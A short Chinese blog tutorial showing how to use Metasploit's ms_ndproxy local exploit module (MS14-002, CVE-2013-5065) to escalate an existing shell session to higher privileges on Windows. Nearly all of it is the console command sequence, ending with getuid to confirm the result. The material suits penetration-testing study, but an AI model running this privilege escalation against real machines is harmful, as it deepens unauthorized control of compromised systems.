Metasploit之NDProxy内核提权

颓废 2019年5月19日10:10:12评论709 views字数 633阅读2分6秒阅读模式

Metasploit之NDProxy内核提权
参考视频:http://open.freebuf.com/inland/459.html

使用这个权限提升模块来提升当前已经获得的shell的权限
所以首先得需要一个shell的会话,即session会话

使用模块“exploit/windows/local/ms_ndproxy”来提升权限的
该漏洞的利用是基于ms14-002,Microsoft Windows NDProxy.sys,CVE-2013-5065

search 14-002                           -->搜索这个漏洞的相关模块

得到下面两个
exploit/windows/local/bthpan            -->微软蓝牙个人区域网络(bthpan。sys)特权升级

exploit/windows/local/ms_ndproxy        -->微软的,即Windows的漏洞利用模块

use exploit/windows/local/ms_ndproxy    -->使用这个模块

show options                            -->查看配置选项

我们可以看到只需要配置一个会话选项SESSION,那么我们只要把需要提升权限的会话set进去即可

set SESSION 1                           -->设置会话1来进行权限提升

exploit                                 -->执行攻击,提升权限 

getuid                                  -->查看当前权限,提权后可查看

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日10:10:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Metasploit之NDProxy内核提权http://cn-sec.com/archives/67376.html

发表评论

匿名网友 填写信息